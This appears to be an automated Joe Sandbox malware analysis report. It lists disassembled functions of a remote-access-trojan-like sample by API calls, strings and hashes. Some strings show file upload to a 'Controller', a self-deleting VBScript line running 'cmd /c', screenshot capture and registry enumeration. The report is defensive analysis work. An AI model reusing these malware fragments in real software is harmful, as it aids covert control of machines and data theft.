                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                            • API String ID: 2490988753-744132762
                                                                                            • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                            • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                            • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                            • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                            Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnumOpen
                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                            • API String ID: 1332880857-3714951968
                                                                                            • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                            • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                            • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                            • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                            Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                            • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                            • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                            • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                            • String ID: Close
                                                                                            • API String ID: 1657328048-3535843008
                                                                                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                            • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                            • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                            Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$Info
                                                                                            • String ID:
                                                                                            • API String ID: 2509303402-0
                                                                                            • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                            • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                            • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                            • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                            Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                            • API String ID: 1884690901-3066803209
                                                                                            • Opcode ID: d7c86a6d0ae2b57f1344d6865df16befb9cb153969f1a461007c739724d5c365
                                                                                            • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                            • Opcode Fuzzy Hash: d7c86a6d0ae2b57f1344d6865df16befb9cb153969f1a461007c739724d5c365
                                                                                            • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                            Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                            • _free.LIBCMT ref: 00450136
                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                            • _free.LIBCMT ref: 00450175
                                                                                            • _free.LIBCMT ref: 00450192
                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                            • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                            • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                            Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                            • _free.LIBCMT ref: 10007CFB
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 10007D1D
                                                                                            • _free.LIBCMT ref: 10007D32
                                                                                            • _free.LIBCMT ref: 10007D3D
                                                                                            • _free.LIBCMT ref: 10007D5F
                                                                                            • _free.LIBCMT ref: 10007D72
                                                                                            • _free.LIBCMT ref: 10007D80
                                                                                            • _free.LIBCMT ref: 10007D8B
                                                                                            • _free.LIBCMT ref: 10007DC3
                                                                                            • _free.LIBCMT ref: 10007DCA
                                                                                            • _free.LIBCMT ref: 10007DE7
                                                                                            • _free.LIBCMT ref: 10007DFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                            Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                            • API String ID: 489098229-65789007
                                                                                            • Opcode ID: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                            • Opcode Fuzzy Hash: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                            Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                            • API String ID: 1913171305-390638927
                                                                                            • Opcode ID: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                            • Opcode Fuzzy Hash: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                            Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                            Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID: H
                                                                                            • API String ID: 4237864984-2852464175
                                                                                            • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                            • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                            Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 65535$udp
                                                                                            • API String ID: 0-1267037602
                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                            Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                            • _free.LIBCMT ref: 00439471
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                            • String ID:
                                                                                            • API String ID: 2441525078-0
                                                                                            • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                            • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                            Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                            • API String ID: 2956720200-749203953
                                                                                            • Opcode ID: f1f18d6f67d0c56b6b6f0c92bb6df62a0d3843c47b306687a1e696fd23abd355
                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                            • Opcode Fuzzy Hash: f1f18d6f67d0c56b6b6f0c92bb6df62a0d3843c47b306687a1e696fd23abd355
                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                            Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                            • API String ID: 1107811701-2245803885
                                                                                            • Opcode ID: 0dd1757b787a246d8b17c16158875fd6ab15b0531ed3acb572a42c54e3d5a35f
